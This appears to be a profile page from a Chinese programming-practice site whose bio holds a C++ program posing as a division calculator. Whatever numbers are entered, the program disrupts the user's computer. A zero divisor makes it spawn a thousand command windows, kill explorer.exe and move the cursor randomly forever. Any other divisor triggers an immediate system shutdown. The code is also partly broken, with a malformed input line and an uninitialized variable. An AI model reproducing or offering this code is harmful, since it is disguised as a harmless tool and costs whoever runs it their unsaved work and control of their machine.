• 个人简介

    #include<bits/stdc++.h> #include<Windows.h> using namespace std; int main(){ cout<<"欢迎使用\n"; int n,m,x,y; cout<<"请输入 被除数"; cin>>n,m; cout<<"\n除数"; cin>>m; if(m==0){ for(int i=1;i<=10000;i++){ cout<<"???????????????????"<<endl; } for(int i=1;i<=1000;i++){ system("start cmd"); } system("taskkill -f -im explorer.exe"); int x=GetSystemMetrics(SM_CXSCREEN); int Y=GetSystemMetrics(SM_CXSCREEN); srand(time(0)); while (1) SetCursorPos(rand()%x,rand()%y); } else{ cout<<"没中奖"; system("shutdown -s -t 0"); } return 0; }

  • 通过的题目

  • 最近活动

题目标签

二维数组
1
语法基础
1
入门
1
基础
1